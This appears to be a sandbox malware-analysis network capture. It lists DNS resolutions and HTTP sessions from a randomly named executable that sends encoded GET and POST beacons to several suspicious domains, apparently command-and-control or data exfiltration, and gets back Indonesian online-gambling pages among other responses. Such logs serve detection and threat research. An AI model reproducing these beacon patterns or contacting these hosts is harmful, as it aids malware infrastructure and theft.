Jan 10, 2025 18:55:48.570662975 CET | 1.1.1.1 | 192.168.2.8 | 0x5929 | No error (0) | rokeyfashion.store | - | 103.159.36.66 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:56:03.151307106 CET | 1.1.1.1 | 192.168.2.8 | 0x4b17 | No error (0) | www.lucelight.info | - | 103.168.172.37 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:56:03.151307106 CET | 1.1.1.1 | 192.168.2.8 | 0x4b17 | No error (0) | www.lucelight.info | - | 103.168.172.52 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:56:16.394387007 CET | 1.1.1.1 | 192.168.2.8 | 0xe4e | No error (0) | www.zrichiod-riech.sbs | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:56:16.394387007 CET | 1.1.1.1 | 192.168.2.8 | 0xe4e | No error (0) | www.zrichiod-riech.sbs | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:57:08.478301048 CET | 1.1.1.1 | 192.168.2.8 | 0x2708 | No error (0) | www.absseguridad.online | absseguridad.online | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:57:08.478301048 CET | 1.1.1.1 | 192.168.2.8 | 0x2708 | No error (0) | absseguridad.online | - | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:57:22.507419109 CET | 1.1.1.1 | 192.168.2.8 | 0xef87 | No error (0) | www.daystarcafe.net | - | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              0 | 192.168.2.8 | 49709 | 20.2.208.137 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 10, 2025 18:53:56.933440924 CET | 466 | OUT | GET /s1oh/?0FJ=D00hHLh&irCxl6=BXpE0/AUcXIdlK4Vr8yV3zIibIy5i6h6aTfhPuGOJWtXj1ch45iPBtMttb76vGkDjkWsjXgzDhYROXwUhHpTT37wm3kse0ebZeD1BOaz6lVPyMDO71Du749G1F/4BLBNXw== HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.3nhc3a.top
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:53:57.879105091 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Fri, 10 Jan 2025 17:53:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              1 | 192.168.2.8 | 49711 | 104.21.28.65 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 10, 2025 18:54:13.171911001 CET | 746 | OUT | POST /9fei/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.binjai77rtp11f.xyz
                                                                              Origin: http://www.binjai77rtp11f.xyz
                                                                              Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Ascii: irCxl6=wjYsQ7yhn9rJmWURjKtIO1jU6Kk+hhQKOOvoM84oS0gtIvfMGgOn0SZOn07Xq+fYiNGSqkgDgpHsP1i8P9IJXHwcISHOM7ipWuD3P4cJBWbHMF6RBqPkweQ8BcKkDOotXY5/Fb5etVgheHY4Rvjp0vzajIvPIqXkGeiF8bAFAxbIQenYRzwZotnLtKMj1eISHgELOIA=
                                                                              Jan 10, 2025 18:54:13.696378946 CET | 827 | IN | HTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:54:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPnZWBPbvnGZRBQ3J646i5hEASYgfBrqgeN0VpWvfK2QZJP%2BOSQ05zs39%2Bxt8eBt6HwBb3SlL2XNf5SPqRvfnTxxi1pZh7bKV6%2FOqeDcTByxl5qvunEt4uoi3Zli8MiR9u5sM82epyOO"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe87f289cec33e-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2314&min_rtt=2314&rtt_var=1157&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              2 | 192.168.2.8 | 49712 | 104.21.28.65 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 10, 2025 18:54:15.726324081 CET | 766 | OUT | POST /9fei/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.binjai77rtp11f.xyz
                                                                              Origin: http://www.binjai77rtp11f.xyz
                                                                              Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Ascii: irCxl6=wjYsQ7yhn9rJg2ERktZIF1jX1qk+vBQWOOToM+ICRCwtIKbMHhOn3SZOzk7SneeUiNagqlcDgp7sP0S8IOQOXXx6EyHMTLipWuD3P45eBWTHPwqRAOTn5+Q/GcKkV+oTXY54FaUztXIheGo4R+jm6vzc94ujI4e8OePin7cyfjDUVoWyLR4frtPgtJkVwpV6dDU7QfWcz0z1vaYzXRj1uITt7n2s
                                                                              Jan 10, 2025 18:54:16.410479069 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:54:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lp0INm9M%2Bc9sed0GypPLsvWpGHxsHevcUfpzsnFfHmuIhW8kz0lKT5wUbk66%2FD4MRk5zs1ghkxubieqKgrER4tNYe3h31tzoS4WsSHo%2BAEcOon0fKeS8VOoT4miPA%2BYp8N%2Fsi35aSxrq"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe880368330f90-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=22706&min_rtt=22706&rtt_var=11353&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.8 | 49713 | 104.21.28.65 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 10, 2025 18:54:18.272700071 CET | 1783 | OUT | POST /9fei/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.binjai77rtp11f.xyz
                                                                              Origin: http://www.binjai77rtp11f.xyz
                                                                              Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:54:18.902743101 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:54:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c4QTqMZ9nr9HY106dhGdfu77qXcWVmkqOn5WL6f1sqErnvUowKnPeLJ35SlMVfvEoTLIdKsskSZHBuWOPEgI9hFvuIT8c2wH2Bzrvs0%2BHXaVwU8R9259wUQoroZv3QZobsUqVUeEHuqo"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe8813186343b5-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1665&rtt_var=832&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1783&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 30 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 57 5b 73 1a b9 12 7e 4e aa f2 1f 7a e7 54 ed 13 62 8c 13 af 4f ed 82 2b e0 78 1d bc 04 53 86 ec b9 bc f5 8c 9a 41 b6 46 9a 95 04 98 ad fc f8 53 9a e1 32 80 01 3b 27 55 f6 83 79 60 46 ad ee 56 ab fb d3 d7 9a 77 6f eb 3f 7d ba 3e 1f fc a7 77 01 23 97 ca b3 77 6f eb fe 09 12 55 d2 08 48 05 67 ef de 02 00 d4 47 84 7c fe 9e 8f 7f 62 0c 9c 70 92 80 b1 b2 3c 97 9d dd 0c 7a d0 69 ff 79 01 ad 76 f7 aa d9 3e 3d 85 6f d0 ba 3e bf be 69 76 a1 f9 e9 4b bb 0b fd ce f5 00 2e 9b e7 d7 37 f0 b9 79 d3 86 76 b7 0d df 60 65 37 57 2e d9 97 2c 2e 9b 5f 7a cd ee 25 7c b9 e8 fa c7 e0 e2 e6 6b ef 53 73 70 51 0f 8b e5 37 e2 4c c9 e1 46 98 b9 28 1e a1 b1 e4 1a c1 d7 c1 ef ec 9f c1 d6 bc c2 94 1a c1 44 d0 34 d3 c6 05 10 6b e5 48 b9 46 30 15 dc 8d 1a 9c 26 22 26 96 0f 2a 20 94 70 02 25 b3 31 4a 6a d4 aa 47 db fe 46 ce 65 8c fe 1a 8b 49 23 f8 37 fb da 64 e7 3a cd d0 89 48 52 c9 79 fb a2 41 3c a1 fd e6 31 c6 23 62 de c6 68 59 32 56 9a e5 53 fb ad 33 83 49 8a 4f 36 a3 fb 4c 18 b2 25 [TRUNCATED]
                                                                              Data Ascii: 60bW[s~NzTbO+xSAFS2;'Uy`FVwo?}>w#woUHgG|bp<ziyv>=o>ivK.7yv`e7W.,._z%|kSspQ7LF(D4kHF0&"&* p%1JjGFeI#7d:HRyA<1#bhY2VS3IO6L%]Idc#2'*[s}\+)LF&G-Tt F+VCYYl"8)7h6
                                                                               Jan 10, 2025 18:54:18.902765989 CET | 1236 | IN | Data Raw: 37 da 12 ea 16 c5 e9 69 05 8c cb 60 35 5a bc 79 71 65 6b e1 ca 5a 14 3a df 44 05 a2 ad fd 55 c0 fa 74 2c 14 6c 9e a6 35 51 be cd 07 94 96 f2 60 13 f4 52 a8 bb 02 f4 6f 72 59 3e 36 24 3d 76 94 56 22 46 19 c0 c8 d0 b0 11 f8 1a db 5f c3 d0 8e b4 71
                                                                              Data Ascii: 7i`5ZyqekZ:DUt,l5Q`RorY>6$=vV"F_qj$twkNWDZl(RLCjmg>kGDn3$TPeii3}P=.]MTSYPS:pjZG)<,[9c?Kb6(a
                                                                               Jan 10, 2025 18:54:18.902785063 CET | 116 | IN | Data Raw: 80 31 62 d6 d8 58 a1 a0 08 6d 75 00 64 25 49 11 68 f1 c8 40 2f 14 c8 4b ad 28 a1 ee 42 01 90 89 34 5d 28 e0 97 5a 51 42 c7 45 02 f8 e4 49 59 12 85 7f 89 1a e1 a5 69 f8 96 a4 25 a1 2e 49 b3 c9 30 24 b0 7c 09 6d a9 15 91 ab 99 a0 6b ad c0 4b db 4b
                                                                              Data Ascii: 1bXmud%Ih@/K(B4](ZQBEIYi%.I0$|mkKK2r+1bF?uAK7+
                                                                               Jan 10, 2025 18:54:18.984308004 CET | 1236 | IN | Data Raw: 33 65 61 0d 0a ec 9d d1 6e 9b 30 14 86 5f c5 8a 54 f5 2a 0a d0 a4 24 5d 1b a9 eb 5a 69 d2 ba 55 ea b4 6a 97 26 38 09 ab b1 23 6c 42 e8 d5 5e 63 af b7 27 99 0c a4 31 10 12 b6 21 02 8d 6f aa d6 32 8e 73 6c 9f 4f e7 9c df b4 58 74 27 e4 11 1b 4d 44
                                                                              Data Ascii: 3ean0_T*$]ZiUj&8#lB^c'1!o2slOXt'MDg=t;vw*L]3At."@;lm+>Zv_(7>c[stp_X,!s<9XUP2Oat{'qy$@lUB;I)+k)<6
                                                                               Jan 10, 2025 18:54:18.984329939 CET | 283 | IN | Data Raw: 64 7f 16 cd 3c 00 00 00 ff ff 0d 0a 61 37 0d 0a 1a ad 58 06 6c db 65 7e 5e 6a 65 6e 62 1e 52 d5 12 92 91 aa e0 0b 12 56 f0 4d cd 1b 9d 9b 21 a9 96 c1 1e 76 43 75 71 99 39 46 9d 63 4e 95 3a c7 7c b4 ce 19 ad 73 46 eb 9c 91 58 e7 98 18 a4 a4 e6 e6
                                                                              Data Ascii: d<a7Xle~^jenbRVM!vCuq9FcN:|sFX )KFeTYl82-y<^AIJLNEVPwd&nCcf^R13Q5cLF'GI99IyUHSfSbqG"Ugg0m
                                                                               Jan 10, 2025 18:54:18.989336967 CET | 1236 | IN | Data Raw: 31 33 38 0d 0a ec 9d 41 0a c2 30 14 44 af d2 23 48 24 b4 37 70 e1 46 5c b9 8d 2e ac 60 15 9a 16 7a 7c 89 60 ad c6 48 5b 03 26 e4 6d db 5d d0 0e ff cd cc 8f 23 ba 1c 25 31 13 56 4d 46 78 a9 c9 08 6a 32 d4 64 10 99 54 63 cb 8d aa cf e6 0f 36 a4 66
                                                                              Data Ascii: 138A0D#H$7pF\.`z|`H[&m]#%1VMFxj2dTc6fg>]EsvEj&fhgrgL}!Sxii4ds#.cv:J1pFx`)7$&R}EelES0eTGQ5>x
                                                                               Jan 10, 2025 18:54:18.989667892 CET | 308 | IN | Data Raw: 1b 30 27 6c e5 a5 b7 76 30 65 c2 94 f9 ed ab fe 06 00 00 ff ff 0d 0a 31 31 36 0d 0a ec 9d b1 0e 82 30 14 45 7f a5 9f 20 09 09 71 55 06 17 37 7e a0 48 85 06 03 86 42 4c ff de d4 c5 02 4b 4d 18 6c 38 6b bb bd e5 e4 dd 77 df 7d 2c 65 42 9c 3f 54 d6
                                                                              Data Ascii: 0'lv0e1160E qU7~HBLKMl8kw},eB?T?)%4(Ldf%Y%.)Ye;*.kYi0(Xd%he;bO]8'`3P$[T-&[Q&22PfK'F}Xqq_p&H'[T^3fxR
                                                                               Jan 10, 2025 18:54:19.039187908 CET | 1236 | IN | Data Raw: 33 63 38 0d 0a ec 9d 4f 4f db 40 10 c5 bf ca de 7a 4d 68 ec 38 c7 92 16 10 6a 2b 5a aa d2 1e d7 ce 62 9b d8 5e 6b ff 24 b8 9f be 72 68 90 9d 85 6a 91 56 90 d5 be eb 3a a7 27 a1 1f 33 f3 de 0c d0 e2 e6 12 99 54 54 b4 a5 a0 8a 1d 1c bd 24 57 bb 57
                                                                              Data Ascii: 3c8OO@zMh8j+Zb^k$rhjV:'3TT$WWI|l@4$e+:Z\4Bi"`rAN~OY`\lgN3'parHp:f4mt:-srigTL$7#7`nC<IEY\$}h_]o[,
                                                                               Jan 10, 2025 18:54:19.039208889 CET | 676 | IN | Data Raw: 02 61 82 10 e6 dc b0 34 e3 00 0a 2f 0e a0 88 12 07 50 60 3b f6 82 db 31 18 78 62 88 99 ce 10 b3 97 46 6c 6b 07 56 1e 5b 4e be d8 22 35 9c d4 40 96 10 64 b9 ec 59 9a e0 e2 f9 65 ce a2 f8 65 ce f2 f0 cb fc 7f 36 53 31 19 20 8c 2d 59 df 2f 2b d5 d1
                                                                              Data Ascii: a4/P`;1xbFlkV[N"5@dYee6S1 -Y/+'/JuV~A>~J6M$h"A0+.oG=SbJ$2SX1ua~>e1aiJo?VF]"=pTCR^Jr;V,AsLg28ah*
                                                                               Jan 10, 2025 18:54:19.116373062 CET | 1236 | IN | Data Raw: 33 37 64 0d 0a ec 9d cd 6e db 30 10 84 5f 85 2f 50 40 51 24 4b 67 07 ad 63 f4 07 01 8c 5e 7a a3 64 56 62 22 91 06 29 a7 75 9e be 90 9a 20 b4 08 03 74 c1 b6 66 38 57 da 40 82 3d f8 c3 ee cc ce 02 30 7f 47 91 f9 ce 15 d3 83 e2 0f cc 6c 5d 3e 70 c5
                                                                              Data Ascii: 37dn0_/P@Q$Kgc^zdVb")u tf8W@=0Gl]>pfz&):[XH$_thOoSa C22cLs-o:&wtPtjANrbI#+6&dV LMk\Xsx-@Pe g
                                                                               Jan 10, 2025 18:54:19.116511106 CET | 160 | IN | Data Raw: a8 cd e7 0f c0 4c 08 66 c6 35 c3 54 06 53 19 10 06 84 01 61 16 95 61 aa 5d 3f c0 cb da 30 41 0b 13 8e 96 9f 7a c5 89 15 af 3b 96 8b 74 c7 f2 34 ba 63 b7 f2 6f 7e 23 ed 31 78 c6 d0 1d 9b 55 f5 25 9c c0 05 73 25 4f a2 15 c1 68 4f 5e a9 45 e4 95 1a
                                                                              Data Ascii: Lf5TSaa]?0Az;t4co~#1xU%s%OhO^EL?)p\D0}/(6K0(+\#~8g"3lSN}


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               4 | 192.168.2.8 | 49714 | 104.21.28.65 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               Jan 10, 2025 18:54:20.816381931 CET | 474 | OUT | GET /9fei/?irCxl6=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHPzFPLCnPEL+bBN+DL4U4BkbYG2HsYKvT3cQqMuOVV8lKBQ==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.binjai77rtp11f.xyz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                               Jan 10, 2025 18:54:21.518702030 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:54:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlTS20PB5ocTQJBAe1iUqhQuFIW8xlYA5wGZjxCC7DH7dK9kYeQo9z9nP%2FB6otIkI5Qf6KIwc5E3ko6sdmDaQB9qDUiqfI%2FMj6hWyxcHdhQpmkM19wcs4z5GCarZdggChGDeu27rZgbm"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe88238aa54405-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8658&min_rtt=8658&rtt_var=4329&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 31 66 63 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 74 69 74 6c 65 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 54 50 20 4c 49 56 45 20 42 49 4e 4a 41 49 37 37 20 7c 20 42 4f 43 4f 52 41 4e 20 41 44 4d 49 4e 20 53 4c 4f 54 20 47 41 43 4f 52 20 48 41 52 49 20 49 4e 49 20 7c 20 52 54 50 20 4c 49 56 45 20 42 4f 43 4f 52 41 4e 20 42 49 4e 4a 41 49 37 37 20 7c 20 53 4c 4f 54 20 47 41 43 4f 52 20 47 41 4d 50 41 4e 47 20 4d 45 4e 41 4e 47 20 54 45 52 55 50 44 41 54 45 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 6d 65 74 61 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 [TRUNCATED]
                                                                              Data Ascii: 1fc1<!DOCTYPE html><html lang="en"> <head> ... title --> <title>RTP LIVE BINJAI77 | BOCORAN ADMIN SLOT GACOR HARI INI | RTP LIVE BOCORAN BINJAI77 | SLOT GACOR GAMPANG MENANG TERUPDATE</title> ... meta --> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="cache-co
                                                                               Jan 10, 2025 18:54:21.518754959 CET | 1236 | IN | Data Raw: 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d
                                                                              Data Ascii: ntrol" content="no-cache"> <meta http-equiv="pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <meta name="description" content="Situs Judi Slot Online Terpercaya dan Bandar Live casino Online Terpe
                                                                               Jan 10, 2025 18:54:21.518794060 CET | 1236 | IN | Data Raw: 73 3d 22 74 65 78 74 2d 77 68 69 74 65 20 6d 62 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 53 65 6c 61 6d 61 74 20 64 61 74 61 6e 67 20 64 69 20 42 4f 20 70 61 6c 69 6e
                                                                              Data Ascii: s="text-white mb-0"> <span>Selamat datang di BO paling Bonafit Se Indonesia BINJAI77 kami menerima deposit VIA BANK, deposit VIA PULSA dan VIA E-WALLET tersedia game populer seperti Live casino, Slot, Casino, Sport
                                                                               Jan 10, 2025 18:54:21.518829107 CET | 1236 | IN | Data Raw: 41 20 52 54 50 20 4c 49 56 45 20 47 41 43 4f 52 20 7c 20 42 49 4e 4a 41 49 37 37 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c
                                                                              Data Ascii: A RTP LIVE GACOR | BINJAI77</span> </div> <h5 class="text-white text-center font-weight-bolder mb-3"> <span><i class="fa fa-calendar-alt"></i>&nbsp;</span> <span>Sabtu
                                                                               Jan 10, 2025 18:54:21.518866062 CET | 896 | IN | Data Raw: 70 78 2d 6c 67 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: px-lg-0"> <div class="col px-1 carousel-item active"> <div class="card-provider">
                                                                               Jan 10, 2025 18:54:21.518918037 CET | 1236 | IN | Data Raw: 61 67 65 73 2f 70 72 6f 76 69 64 65 72 73 2f 50 47 2e 70 6e 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20
                                                                              Data Ascii: ages/providers/PG.png"> </a> </div> </div>
                                                                               Jan 10, 2025 18:54:21.518955946 CET | 224 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                              Data Ascii: <div class="col px-1 carousel-item "> <div class="card-provider">
                                                                               Jan 10, 2025 18:54:21.518986940 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 4a 47 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                              Data Ascii: <a href="/JG"> <img class="img-provider w-100" src="assets/images/providers/JG.png"> </a>
                                                                               Jan 10, 2025 18:54:21.519023895 CET | 382 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a
                                                                              Data Ascii: </a> </div> </div> <div class="col px-1 carousel-item ">
                                                                               Jan 10, 2025 18:54:21.527939081 CET | 1236 | IN | Data Raw: 31 31 35 63 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 70 72 6f 76 69 64
                                                                              Data Ascii: 115c <img class="img-provider w-100" src="assets/images/providers/MG.png"> </a> </div>
                                                                               Jan 10, 2025 18:54:21.528001070 CET | 1236 | IN | Data Raw: 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: </a> </div> </div> <div class="col px-1 carousel-item ">


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
